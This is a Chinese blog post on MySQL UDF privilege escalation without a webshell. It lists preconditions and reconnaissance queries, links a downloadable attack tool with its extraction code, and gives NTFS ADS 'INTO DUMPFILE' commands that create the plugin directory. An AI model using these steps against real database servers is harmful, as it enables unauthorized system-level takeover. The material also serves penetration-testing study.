MySQL提权之udf提权(无webshell的情况)

Posted 2020-12-23 My_Dreams

0x00 介绍

本篇我们来讲无webshell时利用udf进行提权

0x01 前提

1. 必须是root权限（主要是得创建和抛弃自定义函数）

2. secure_file_priv=(未写路径)

3. 将udf.dll文件上传到mysql的plugin目录下（这里以MySQL>=5.1为例）

0x02 提权中用到的查询语句

 

1 SELECT version(); #查询数据库版本
2  
3 SELECT @@basedir; #查询MySQL的安装目录
4  
5 SELECT user();  #查询当前用户
6  
7 SHOW VARIABLES LIKE \'%plugins%\';  #查找是否有plugins目录
8  
9 show variables like \'%compile%\'; #查看数据库位数

 

 

 

0x03 工具

暗月工具

下载地址：https://pan.baidu.com/s/1EoGKX6bksOCFGgonFvfgYw 提取码：8ng0
个人感觉这个工具依然需要在plugin文件夹存在的前提下
打开工具页面如下：

 

 

 

 接下来直接执行命令即可

 

 

 这工具真的是太香了

ps: 

这里补充一点，

这里的关键是lib目录下没有plugin文件夹，得突破限制创建文件夹
还有一种创建plugin文件夹的方式（我没成功过，有缘的小伙伴可能会成功）
一般Lib、Plugin文件夹需要手工建立（可用NTFS ADS流模式突破进而创建文件夹）

select @@basedir; //查找到mysql的目录

select \'It is dll\' into dumpfile \'C:\\\\Program Files\\\\MySQL\\\\MySQL Server 5.1\\\\lib::$INDEX_ALLOCATION\'; //利用NTFS ADS创建lib目录

select \'It is dll\' into dumpfile \'C:\\\\Program Files\\\\MySQL\\\\MySQL Server 5.1\\\\lib\\\\plugin::$INDEX_ALLOCATION\'; //利用NTFS ADS创建plugin目录